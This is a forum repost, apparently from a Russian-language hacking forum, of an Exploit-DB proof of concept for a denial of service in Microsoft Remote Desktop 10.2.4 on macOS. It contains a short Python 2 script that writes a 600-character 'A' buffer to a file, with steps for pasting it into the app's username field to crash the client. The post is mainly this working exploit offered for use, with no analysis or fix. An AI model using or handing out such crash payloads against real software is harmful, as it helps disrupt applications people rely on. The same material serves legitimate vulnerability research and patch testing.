Exploit Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
46236
Проверка EDB
  1. Пройдено
Автор
SAEED HASANZADEH
Тип уязвимости
DOS
Платформа
MACOS
CVE
N/A
Дата публикации
2019-01-24
Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
Код:
# Exploit Title: Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)
# Date: 2019/01/24
# Author: Saeed Hasanzadeh (Net.Hun73r)
# Twitter: @nethun73r
# Software Link: https://itunes.apple.com/us/app/microsoft-remote-desktop-10/id1295203466?mt=12
# Version: 10.2.4(134)
# Tested on: Mac OS Mojave(10.14.2)

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the add Desktop > add user account >UserName
# App will now crash

buffer = "A" * 600
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
 
Источник
www.exploit-db.com

Похожие темы